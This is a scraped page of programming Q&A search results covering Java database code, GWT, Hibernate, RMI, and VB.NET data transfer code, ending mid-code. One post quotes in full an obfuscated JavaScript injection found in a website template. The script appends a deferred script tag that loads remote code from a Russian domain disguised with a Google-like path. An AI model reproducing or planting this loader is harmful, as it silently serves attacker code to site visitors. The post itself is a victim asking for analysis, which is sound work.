Search Results

Search found 6972 results on 279 pages for 'catch phrases'.

Page 43/279 | < Previous Page | 39 40 41 42 43 44 45 46 47 48 49 50  | Next Page >

  • i want to show the result of my code on a web page because it is being showed on a console??

    - by lojayna
    package collabsoft.backlog_reports.c4; import java.sql.CallableStatement; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.Statement; //import collabsoft.backlog_reports.c4.Report; public class Report { private Connection con; public Report(){ connectUsingJDBC(); } public static void main(String args[]){ Report dc = new Report(); dc.reviewMeeting(6, 8, 10); dc.createReport("dede",100); //dc.viewReport(100); // dc.custRent(3344,123,22,11-11-2009); } /** the following method is used to connect to the database **/ public void connectUsingJDBC() { // This is the name of the ODBC data source String dataSourceName = "Simple_DB"; try { // loading the driver in the memory Class.forName("sun.jdbc.odbc.JdbcOdbcDriver"); // This is the connection URL String dbURL = "jdbc:odbc:" + dataSourceName; con = DriverManager.getConnection("jdbc:mysql://localhost:3306/Collabsoft","root",""); // This line is used to print the name of the driver and it would throw an exception if a problem occured System.out.println("User connected using driver: " + con.getMetaData().getDriverName()); //Addcustomer(con,1111,"aaa","aaa","aa","aam","111","2222","111"); //rentedMovies(con); //executePreparedStatement(con); //executeCallableStatement(con); //executeBatch(con); } catch (Exception e) { e.printStackTrace(); } } /** *this code is to link the SQL code with the java for the task *as an admin I should be able to create a report of a review meeting including notes, tasks and users *i will take the task id and user id and note id that will be needed to be added in the review meeting report and i will display the information related to these ida */ public void reviewMeeting(int taskID, int userID, int noteID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL report_review_meeting(?,?,?)}"); callableStatement.setInt(1,taskID); callableStatement.setInt(2,userID); callableStatement.setInt(3,noteID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } ////////////////////////////////// ///////////////////////////////// public void allproject(int projID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL all_project(?)}"); callableStatement.setInt(1,projID); //callableStatement.setInt(2,userID); //callableStatement.setInt(3,noteID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } /////////////////////////////// /** * here i take the event id and i take a string report and then * i relate the report with the event **/ public void createReport(String report,int E_ID )// law el proc bt return table { try{ Statement st = con.createStatement(); st.executeUpdate("UPDATE e_vent SET e_vent.report=report WHERE e_vent.E_ID= E_ID;"); /* CallableStatement callableStatement = con.prepareCall("{CALL Create_report(?,?)}"); callableStatement.setString(1,report); callableStatement.setInt(2,E_ID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); }*/ } catch(Exception e) { System.out.println("E"); System.out.println(e); } } /** in the following method i view the report of the event having the ID eventID */ public void viewReport(int eventID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL view_report(?)}"); callableStatement.setInt(1,eventID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } } // the result of these methods is being showed on the console , i am using WIcket and i want it 2 be showed on the web how is that done ?! thnxxx

    Read the article

  • Weird Javascript in Template. Is this a hacking attempt?

    - by Julian
    I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. What is this javascript doing? Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script... this.v=27047; this.v+=187; ug=["n"]; OV=29534; OV--; var y; var C="C"; var T={}; r=function(){ b=36068; b-=144; M=[]; function f(V,w,U){ return V.substr(w,U); var wH=39640; } var L=["o"]; var cj={}; var qK={N:false}; var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); var BT="BT"; var fV=RegExp; var CE={bf:false}; var UW=''; this.Ky=11592; this.Ky-=237; var VU=document; var _n=[]; try {} catch(wP){}; this.JY=29554; this.JY-=245; function s(V,w){ l=13628; l--; var U="["+w+String("]"); var rk=new fV(U, f("giId",0,1)); this.NS=18321;this.NS+=195;return V.replace(rk, UW); try {} catch(k){}; }; this.jM=""; var CT={}; var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); try {var vv='m'} catch(vv){}; var Os={}; var t=null; var e=String("bod"+"y"); var F=155183-147103; this.kp=''; Z={Ug:false}; y=function(){ var kl=["mF","Q","cR"]; try { Bf=11271; Bf-=179; var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); Fp=VU[u](A); var H=""; try {} catch(WK){}; this.Ca=19053; this.Ca--; var O=s('s5rLcI','2A5IhLo'); var V=F+fa; this.bK=""; var ya=String("de"+"fe"+f("r3bPZ",0,1)); var bk=new String(); pB=9522; pB++; Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; Fp[ya]=[1][0]; Pe=45847; Pe--; VU[e].appendChild(Fp); var lg=new Array(); var aQ={vl:"JC"}; this.KL="KL"; } catch(x){ this.Ja=""; Th=["pj","zx","kO"]; var Jr=''; }; Tr={qZ:21084}; }; this.pL=false; }; be={}; rkE={hb:"vG"}; r(); var bY=new Date(); window.onload=y; cU=["Yr","gv"];

    Read the article

  • Google Web Toolkit Deferred Binding Issue

    - by snctln
    I developed a web app using GWT about 2 years ago, since then the application has evolved. In its current state it relies on fetching a single XML file and parsing the information from it. Overall this works great. A requirement of this app is that it needs to be able to be ran from the filesystem (file:///..) as well as the traditional model of running from a webserver (http://...) Fetching this file from a webserver works exactly as expected using a RequestBuilder object. When running the app from the filesystem Firefox, Opera, Safari, and Chrome all behave as expected. When running the app from the filesystem using IE7 or IE8 the RequestBuilder.send() call fails, the information about the error suggests that there is a problem accessing the file due to violating the same origin policy. The app worked as expected in IE6 but not in IE7 or IE8. So I looked at the source code of RequestBuilder.java and saw that the actual request was being executed with an XMLHttpRequest GWT object. So I looked at the source code for XMLHttpRequest.java and found out some information. Here is the code (starts at line 83 in XMLHttpRequest.java) public static native XMLHttpRequest create() /*-{ if ($wnd.XMLHttpRequest) { return new XMLHttpRequest(); } else { try { return new ActiveXObject('MSXML2.XMLHTTP.3.0'); } catch (e) { return new ActiveXObject("Microsoft.XMLHTTP"); } } }-*/; So basically if an XMLHttpRequest cannot be created (like in IE6 because it is not available) an ActiveXObject is used instead. I read up a little bit more on the IE implementation of XMLHttpRequest, and it appears that it is only supported for interacting with files on a webserver. I found a setting in IE8 (Tools-Internet Options-Advanced-Security-Enable native XMLHTTP support), when I uncheck this box my app works. I assume this is because I am more of less telling IE to not use their implementation of XmlHttpRequest, so GWT just uses an ActiveXObject because it doesn't think the native XmlHttpRequest is available. This fixes the problem, but is hardly a long term solution. I can currently catch a failed send request and verify that it was trying to fetch the XML file from the filesystem using normal GWT. What I would like to do in this case is catch the IE7 and IE8 case and have them use a ActiveXObject instead of a native XmlHttpRequest object. There was a posting on the GWT google group that had a supposed solution for this problem (link). Looking at it I can tell that it was created for an older version of GWT. I am using the latest release and think that this is more or less what I would like to do (use GWT deferred binding to detect a specific browser type and run my own implementation of XMLHttpRequest.java in place of the built in GWT implementation). Here is the code that I am trying to use package com.mycompany.myapp.client; import com.google.gwt.xhr.client.XMLHttpRequest; public class XMLHttpRequestIE7or8 extends XMLHttpRequest { // commented out the "override" so that eclipse and the ant build script don't throw errors //@Override public static native XMLHttpRequest create() /*-{ try { return new ActiveXObject('MSXML2.XMLHTTP.3.0'); } catch (e) { return new ActiveXObject("Microsoft.XMLHTTP"); } }-*/; // have an empty protected constructor so the ant build script doesn't throw errors // the actual XMLHttpRequest constructor is empty as well so this shouldn't cause any problems protected XMLHttpRequestIE7or8() { } }; And here are the lines that I added to my module xml <replace-with class="com.mycompany.myapp.client.XMLHttpRequestIE7or8"> <when-type-is class="com.google.gwt.xhr.client.XMLHttpRequest"/> <any> <when-property-is name="user.agent" value="ie7" /> <when-property-is name="user.agent" value="ie8" /> </any> </replace-with> From what I can tell this should work, but my code never runs. Does anyone have any idea of what I am doing wrong? Should I not do this via deferred binding and just use native javascript when I catch the fail case instead? Is there a different way of approaching this problem that I have not mentioned? All replies are welcome.

    Read the article

  • Parse a text file into multiple text file

    - by Vijay Kumar Singh
    I want to get multiple file by parsing a input file Through Java. The Input file contains many fasta format of thousands of protein sequence and I want to generate raw format(i.e., without any comma semicolon and without any extra symbol like "", "[", "]" etc) of each protein sequence. A fasta sequence starts form "" symbol followed by description of protein and then sequence of protein. For example ? lcl|NC_000001.10_cdsid_XP_003403591.1 [gene=LOC100652771] [protein=hypothetical protein LOC100652771] [protein_id=XP_003403591.1] [location=join(12190..12227,12595..12721,13403..13639)] MSESINFSHNLGQLLSPPRCVVMPGMPFPSIRSPELQKTTADLDHTLVSVPSVAESLHHPEITFLTAFCL PSFTRSRPLPDRQLHHCLALCPSFALPAGDGVCHGPGLQGSCYKGETQESVESRVLPGPRHRH Like above formate the input file contains 1000s of protein sequence. I have to generate thousands of raw file containing only individual protein sequence without any special symbol or gaps. I have developed the code for it in Java but out put is : Cannot open a file followed by cannot find file. Please help me to solve my problem. Regards Vijay Kumar Garg Varanasi Bharat (India) The code is /*Java code to convert FASTA format to a raw format*/ import java.io.*; import java.util.*; import java.util.regex.*; import java.io.FileInputStream; // java package for using regular expression public class Arrayren { public static void main(String args[]) throws IOException { String a[]=new String[1000]; String b[][] =new String[1000][1000]; /*open the id file*/ try { File f = new File ("input.txt"); //opening the text document containing genbank ids FileInputStream fis = new FileInputStream("input.txt"); //Reading the file contents through inputstream BufferedInputStream bis = new BufferedInputStream(fis); // Writing the contents to a buffered stream DataInputStream dis = new DataInputStream(bis); //Method for reading Java Standard data types String inputline; String line; String separator = System.getProperty("line.separator"); // reads a line till next line operator is found int i=0; while ((inputline=dis.readLine()) != null) { i++; a[i]=inputline; a[i]=a[i].replaceAll(separator,""); //replaces unwanted patterns like /n with space a[i]=a[i].trim(); // trims out if any space is available a[i]=a[i]+".txt"; //takes the file name into an array try // to handle run time error /*take the sequence in to an array*/ { BufferedReader in = new BufferedReader (new FileReader(a[i])); String inline = null; int j=0; while((inline=in.readLine()) != null) { j++; b[i][j]=inline; Pattern q=Pattern.compile(">"); //Compiling the regular expression Matcher n=q.matcher(inline); //creates the matcher for the above pattern if(n.find()) { /*appending the comment line*/ b[i][j]=b[i][j].replaceAll(">gi",""); //identify the pattern and replace it with a space b[i][j]=b[i][j].replaceAll("[a-zA-Z]",""); b[i][j]=b[i][j].replaceAll("|",""); b[i][j]=b[i][j].replaceAll("\\d{1,15}",""); b[i][j]=b[i][j].replaceAll(".",""); b[i][j]=b[i][j].replaceAll("_",""); b[i][j]=b[i][j].replaceAll("\\(",""); b[i][j]=b[i][j].replaceAll("\\)",""); } /*printing the sequence in to a text file*/ b[i][j]=b[i][j].replaceAll(separator,""); b[i][j]=b[i][j].trim(); // trims out if any space is available File create = new File(inputline+"R.txt"); try { if(!create.exists()) { create.createNewFile(); // creates a new file } else { System.out.println("file already exists"); } } catch(IOException e) // to catch the exception and print the error if cannot open a file { System.err.println("cannot create a file"); } BufferedWriter outt = new BufferedWriter(new FileWriter(inputline+"R.txt", true)); outt.write(b[i][j]); // printing the contents to a text file outt.close(); // closing the text file System.out.println(b[i][j]); } } catch(Exception e) { System.out.println("cannot open a file"); } } } catch(Exception ex) // catch the exception and prints the error if cannot find file { System.out.println("cannot find file "); } } } If you provide me correct it will be much easier to understand.

    Read the article

  • hibernate not picking sessionFactory

    - by Satya
    My application-context.xml is <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd"> <beans> <bean id="myDataSource" class="org.apache.commons.dbcp.BasicDataSource" destroy-method="close"> <property name="driverClassName"><value>com.mysql.jdbc.Driver</value></property> <property name="url"><value>jdbc:mysql://localhost:3306/myDB</value></property> <property name="username"><value>myUser</value></property> <property name="password"><value>myUser</value></property> </bean> <bean id="mySessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean"> <property name="mappingResources"> <property name="dataSource"><ref bean="myDataSource"/></property> <list> <value>com/x/model/config/hibernate/user.hbm.xml</value> </list> </property> <property name="hibernateProperties" > <value> hibernate.dialect=org.hibernate.dialect.MySQLDialect </value> </property> </bean> <bean id="userdao" class="com.x.y.z.UserDao"> <property name="sessionFactory"><ref bean="mySessionFactory"/></property> </bean> </beans> user.hbm.xml is <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE hibernate-mapping PUBLIC "-//Hibernate/Hibernate Mapping DTD//EN" "http://hibernate.sourceforge.net/hibernate-mapping-3.0.dtd"> <hibernate-mapping package="com.cpt.model"> <class name="User" table="user"> <id name="userId" column="id"> <generator class="native"/> </id> <property name="firstname" column="firstName" /> <property name="lastName" column="lastName"/> <property name="login" column="login"/> <property name="pass" column="pass"/> <property name="superemail" column="superEmail"/> </class> </hibernate-mapping> and the UserDao is package com.x.y.z; import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; import java.sql.Statement; import org.hibernate.HibernateException; import org.hibernate.Session; import org.hibernate.SessionFactory; import org.hibernate.cfg.Configuration; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.orm.hibernate.support.HibernateDaoSupport; import org.springframework.stereotype.Component; import com.x.model.User; @Component public class UserDao { private SessionFactory sessionFactory; public void addUser(User user) { Session session; try { try { session = getSessionFactory().openSession(); // session = sessionFactory.openSession(); session.save(user); } catch (RuntimeException e) { // TODO Auto-generated catch block e.printStackTrace(); } } catch (HibernateException e) { // TODO Auto-generated catch block System.out.println("printing in the catch"); e.printStackTrace(); } } public SessionFactory getSessionFactory() { System.out.println("returning session factory ::: sessionFactory == null :: "+sessionFactory.openSession()); return sessionFactory; } public void setSessionFactory(SessionFactory sessionFactory) { System.out.println("this is setting session factory" + sessionFactory.getClass()); System.out.println("setting session factory ::: sessionFactory == null :: "+sessionFactory==null); this.sessionFactory = sessionFactory; System.out.println("setting session factory ::: sessionFactory == null :: "+this.sessionFactory.openSession().getClass()); System.out.println(getSessionFactory().openSession().isOpen()); } } However, I keep getting 14:45:09,929 INFO [org.hibernate.impl.SessionFactoryImpl] building session fact ory 14:45:09,933 WARN [net.sf.ehcache.config.Configurator] No configuration found. Configuring ehcache from ehcache-failsafe.xml found in the classpath: vfs:/C:/jb /server/default/deploy/C.war/WEB-INF/lib/ehcache-1.1.jar/ehcache-failsafe.xml 14:45:10,007 INFO [org.hibernate.impl.SessionFactoryObjectFactory] Not binding factory to JNDI, no JNDI name configured 14:45:10,008 INFO [org.hibernate.impl.SessionFactoryImpl] Checking 0 named quer ies 14:45:10,017 INFO [STDOUT] this is setting session factoryclass $Proxy178 14:45:10,017 INFO [STDOUT] false 14:45:10,019 INFO [STDOUT] setting session factory ::: sessionFactory == null : : class org.hibernate.impl.SessionImpl 14:45:10,020 INFO [STDOUT] returning session factory ::: sessionFactory == null :: org.hibernate.impl.SessionImpl(PersistentContext[entitiesByKey={}] ActionQue ue[insertions=[] updates=[] deletions=[] collectionCreations=[] collectionRemova ls=[] collectionUpdates=[]]) It is giving sessionFactory null . Any Idea where am I failing ? Thanks

    Read the article

  • Netbeans Java SE GUI Builder: private initComponents() problem

    - by maSnun
    When I build a GUI for my Java SE app with Netbeans GUI builder, it puts all the codes in the initComponents() method which is private. I could not change it to public. So, all the components are accessible only to the class containing the UI. I want to access those components from another class so that I can write custom event handlers and everything. Most importantly I want to separate my GUI code and non-GUI from each other. I can copy paste the GUI code and later make them public by hand to achieve what I want. But thats a pain. I have to handcraft a portion whenever I need to re-design the UI. What I tried to do: I used the variable identifier to make the text box public. Now how can I access the text box from the Main class? I think I need the component generated in a public method as well. I am new to Java. Any helps? Here's the sample classes: The UI (uiFrame.java) /* * To change this template, choose Tools | Templates * and open the template in the editor. */ /* * uiFrame.java * * Created on Jun 3, 2010, 9:33:15 PM */ package barcode; import java.util.logging.Level; import java.util.logging.Logger; import javax.swing.JFileChooser; import javax.swing.UIManager; import javax.swing.UnsupportedLookAndFeelException; import net.sourceforge.barbecue.output.OutputException; /** * * @author masnun */ public class uiFrame extends javax.swing.JFrame { /** Creates new form uiFrame */ public uiFrame() { try { try { // Set cross-platform Java L&F (also called "Metal") UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName()); } catch (ClassNotFoundException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } catch (InstantiationException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } catch (UnsupportedLookAndFeelException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } } finally { } initComponents(); } /** This method is called from within the constructor to * initialize the form. * WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. */ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code"> private void initComponents() { label1 = new javax.swing.JLabel(); textBox = new javax.swing.JTextField(); saveButton = new javax.swing.JButton(); setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE); label1.setFont(label1.getFont().deriveFont(label1.getFont().getStyle() | java.awt.Font.BOLD, 13)); label1.setText("Type a text:"); label1.setName("label1"); // NOI18N saveButton.setText("Save"); saveButton.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { saveButtonMousePressed(evt); } }); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addGap(56, 56, 56) .addComponent(textBox, javax.swing.GroupLayout.PREFERRED_SIZE, 272, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap(72, Short.MAX_VALUE)) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(154, Short.MAX_VALUE) .addComponent(saveButton, javax.swing.GroupLayout.PREFERRED_SIZE, 102, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(144, 144, 144)) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(140, Short.MAX_VALUE) .addComponent(label1, javax.swing.GroupLayout.PREFERRED_SIZE, 133, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(127, 127, 127)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(label1, javax.swing.GroupLayout.PREFERRED_SIZE, 25, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(textBox, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(saveButton) .addContainerGap(193, Short.MAX_VALUE)) ); pack(); }// </editor-fold> @SuppressWarnings("static-access") private void saveButtonMousePressed(java.awt.event.MouseEvent evt) { JFileChooser file = new JFileChooser(); file.showSaveDialog(null); String data = file.getSelectedFile().getAbsolutePath(); String text = textBox.getText(); BarcodeGenerator barcodeFactory = new BarcodeGenerator(); try { barcodeFactory.generateBarcode(text, data); } catch (OutputException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } } /** * @param args the command line arguments */ // Variables declaration - do not modify private javax.swing.JLabel label1; private javax.swing.JButton saveButton; public javax.swing.JTextField textBox; // End of variables declaration } The Main Class (Main.java) package barcode; import javax.swing.JFrame; public class Main { public static void main(String[] args) { JFrame ui = new uiFrame(); ui.pack(); ui.show(); } }

    Read the article

  • Java RMI cannot connect to host from external client.

    - by Koe
    I've been using RMI in this project for a while. I've gotten the client program to connect (amongst other things) to the server when running it over my LAN, however when running it over the internet I'm running into the following exception: java.rmi.ConnectException: Connection refused to host: (private IP of host machine); nested exception is: java.net.ConnectException: Connection timed out: connect at sun.rmi.transport.tcp.TCPEndpoint.newSocket(Unknown Source) at sun.rmi.transport.tcp.TCPChannel.createConnection(Unknown Source) at sun.rmi.transport.tcp.TCPChannel.newConnection(Unknown Source) at sun.rmi.server.UnicastRef.invoke(Unknown Source) at java.rmi.server.RemoteObjectInvocationHandler.invokeRemoteMethod(Unknown Source) at java.rmi.server.RemoteObjectInvocationHandler.invoke(Unknown Source) at $Proxy1.ping(Unknown Source) at client.Launcher$PingLabel.runPing(Launcher.java:366) at client.Launcher$PingLabel.<init>(Launcher.java:353) at client.Launcher.setupContentPane(Launcher.java:112) at client.Launcher.<init>(Launcher.java:99) at client.Launcher.main(Launcher.java:59) Caused by: java.net.ConnectException: Connection timed out: connect at java.net.PlainSocketImpl.socketConnect(Native Method) at java.net.PlainSocketImpl.doConnect(Unknown Source) at java.net.PlainSocketImpl.connectToAddress(Unknown Source) at java.net.PlainSocketImpl.connect(Unknown Source) at java.net.SocksSocketImpl.connect(Unknown Source) at java.net.Socket.connect(Unknown Source) at java.net.Socket.connect(Unknown Source) at java.net.Socket.<init>(Unknown Source) at java.net.Socket.<init>(Unknown Source) at sun.rmi.transport.proxy.RMIDirectSocketFactory.createSocket(Unknown Source) at sun.rmi.transport.proxy.RMIMasterSocketFactory.createSocket(Unknown Source) ... 12 more This error is remeniscent of my early implementation of RMI and I can obtain the error verbatum if I run the client locally without the server program running as well. To me Connection Timed Out means a problem with the server's response. Here's the client initiation: public static void main(String[] args) { try { String host = "<WAN IP>"; Registry registry = LocateRegistry.getRegistry(host, 1099); Login lstub = (Login) registry.lookup("Login Server"); Information istub = (Information) registry.lookup("Game Server"); new Launcher(istub, lstub); } catch (RemoteException e) { System.err.println("Client exception: " + e.toString()); e.printStackTrace(); } catch (NotBoundException e) { System.err.println("Client exception: " + e.toString()); e.printStackTrace(); } } Interestingly enough no Remote Exception is thrown here. Here's the server initiation: public static void main(String args[]) { try { GameServer gobj = new GameServer(); Information gstub = (Information) UnicastRemoteObject.exportObject( gobj, 1099); Registry registry = LocateRegistry.createRegistry(1099); registry.bind("Game Server", gstub); LoginServer lobj = new LoginServer(gobj); Login lstub = (Login) UnicastRemoteObject.exportObject(lobj, 7099); // Bind the remote object's stub in the registry registry.bind("Login Server", lstub); System.out.println("Server ready"); } catch (Exception e) { System.err.println("Server exception: " + e.toString()); e.printStackTrace(); } } Bad practice with the catch(Exception e) I know but bear with me. Up to this stage I know it works fine over the LAN, here's where the exception occurs over the WAN and is the first place a method in the server is called: private class PingLabel extends JLabel { private static final long serialVersionUID = 1L; public PingLabel() { super(""); runPing(); } public void setText(String text) { super.setText("Ping: " + text + "ms"); } public void runPing() { try { PingThread pt = new PingThread(); gameServer.ping(); pt.setRecieved(true); setText("" + pt.getTime()); } catch (RemoteException e) { e.printStackTrace(); } } } That's a label placed on the launcher as a ping test. the method ping(), in gameserver does nothing, as in is a null method. It's worth noting also that ports 1099 and 7099 are forwarded to the server machine (which should be obvious from the stack trace). Can anyone see anyting I'm missing/doing wrong? If you need any more information just ask. EDIT: I'm practically certain the problem has nothing to do with my router settings. When disabling my port forwarding settings I get a slightly different error: Client exception: java.rmi.ConnectException: Connection refused to host: (-WAN IP NOT LOCAL IP-); but it appears both on the machine locally connected to the server and on the remote machine. In addition, I got it to work seamlessly when connecting the server straight tho the modem (cutting out the router. I can only conclude the problem is in my router's settings but can't see where (I've checked and double checked the port forwarding page). That's the only answer i can come up with.

    Read the article

  • Fastest way to move records from a oracle DB into MS sql server after processing

    - by user347748
    Hi.. Ok this is the scenario...I have a table in Oracle that acts like a queue... A VB.net program reads the queue and calls a stored proc in MS SQL Server that processes and then inserts the message into another SQL server table and then deletes the record from the oracle table. We use a datareader to read the records from Oracle and then call the stored proc for each of the records. The program seems to be a little slow. The stored procedure itself isnt slow. The SP by itself when called in a loop can process about 2000 records in 20 seconds. BUt when called from the .Net program, the execution time is about 5 records per second. I have seen that most of the time consumed is in calling the stored procedure and waiting for it to return. Is there a better way of doing this? Here is a snippet of the actual code Function StartDataXfer() As Boolean Dim status As Boolean = False Try SqlConn.Open() OraConn.Open() c.ErrorLog(Now.ToString & "--Going to Get the messages from oracle", 1) If GetMsgsFromOracle() Then c.ErrorLog(Now.ToString & "--Got messages from oracle", 1) If ProcessMessages() Then c.ErrorLog(Now.ToString & "--Finished Processing all messages in the queue", 0) status = True Else c.ErrorLog(Now.ToString & "--Failed to Process all messages in the queue", 0) status = False End If Else status = True End If StartDataXfer = status Catch ex As Exception Finally SqlConn.Close() OraConn.Close() End Try End Function Private Function GetMsgsFromOracle() As Boolean Try OraDataAdapter = New OleDb.OleDbDataAdapter OraDataTable = New System.Data.DataTable OraSelCmd = New OleDb.OleDbCommand GetMsgsFromOracle = False With OraSelCmd .CommandType = CommandType.Text .Connection = OraConn .CommandText = GetMsgSql End With OraDataAdapter.SelectCommand = OraSelCmd OraDataAdapter.Fill(OraDataTable) If OraDataTable.Rows.Count > 0 Then GetMsgsFromOracle = True End If Catch ex As Exception GetMsgsFromOracle = False End Try End Function Private Function ProcessMessages() As Boolean Try ProcessMessages = False PrepareSQLInsert() PrepOraDel() i = 0 Dim Method As Integer Dim OraDataRow As DataRow c.ErrorLog(Now.ToString & "--Going to call message sending procedure", 2) For Each OraDataRow In OraDataTable.Rows With OraDataRow Method = GetMethod(.Item(0)) SQLInsCmd.Parameters("RelLifeTime").Value = c.RelLifetime SQLInsCmd.Parameters("Param1").Value = Nothing SQLInsCmd.Parameters("ID").Value = GenerateTransactionID() ' Nothing SQLInsCmd.Parameters("UID").Value = Nothing SQLInsCmd.Parameters("Param").Value = Nothing SQLInsCmd.Parameters("Credit").Value = 0 SQLInsCmd.ExecuteNonQuery() 'check the return value If SQLInsCmd.Parameters("ReturnValue").Value = 1 And SQLInsCmd.Parameters("OutPutParam").Value = 0 Then 'success 'delete the input record from the source table once it is logged c.ErrorLog(Now.ToString & "--Moved record successfully", 2) OraDataAdapter.DeleteCommand.Parameters("P(0)").Value = OraDataRow.Item(6) OraDataAdapter.DeleteCommand.ExecuteNonQuery() c.ErrorLog(Now.ToString & "--Deleted record successfully", 2) OraDataAdapter.Update(OraDataTable) c.ErrorLog(Now.ToString & "--Committed record successfully", 2) i = i + 1 Else 'failure c.ErrorLog(Now.ToString & "--Failed to exec: " & c.DestIns & "Status: " & SQLInsCmd.Parameters("OutPutParam").Value & " and TrackId: " & SQLInsCmd.Parameters("TrackID").Value.ToString, 0) End If If File.Exists("stop.txt") Then c.ErrorLog(Now.ToString & "--Stop File Found", 1) 'ProcessMessages = True 'Exit Function Exit For End If End With Next OraDataAdapter.Update(OraDataTable) c.ErrorLog(Now.ToString & "--Updated Oracle Table", 1) c.ErrorLog(Now.ToString & "--Moved " & i & " records from Oracle to SQL Table", 1) ProcessMessages = True Catch ex As Exception ProcessMessages = False c.ErrorLog(Now.ToString & "--MoveMsgsToSQL: " & ex.Message, 0) Finally OraDataTable.Clear() OraDataTable.Dispose() OraDataAdapter.Dispose() OraDelCmd.Dispose() OraDelCmd = Nothing OraSelCmd = Nothing OraDataTable = Nothing OraDataAdapter = Nothing End Try End Function Public Function GenerateTransactionID() As Int64 Dim SeqNo As Int64 Dim qry As String Dim SqlTransCmd As New OleDb.OleDbCommand qry = " select seqno from StoreSeqNo" SqlTransCmd.CommandType = CommandType.Text SqlTransCmd.Connection = SqlConn SqlTransCmd.CommandText = qry SeqNo = SqlTransCmd.ExecuteScalar If SeqNo > 2147483647 Then qry = "update StoreSeqNo set seqno=1" SqlTransCmd.CommandText = qry SqlTransCmd.ExecuteNonQuery() GenerateTransactionID = 1 Else qry = "update StoreSeqNo set seqno=" & SeqNo + 1 SqlTransCmd.CommandText = qry SqlTransCmd.ExecuteNonQuery() GenerateTransactionID = SeqNo End If End Function Private Function PrepareSQLInsert() As Boolean 'function to prepare the insert statement for the insert into the SQL stmt using 'the sql procedure SMSProcessAndDispatch Try Dim dr As 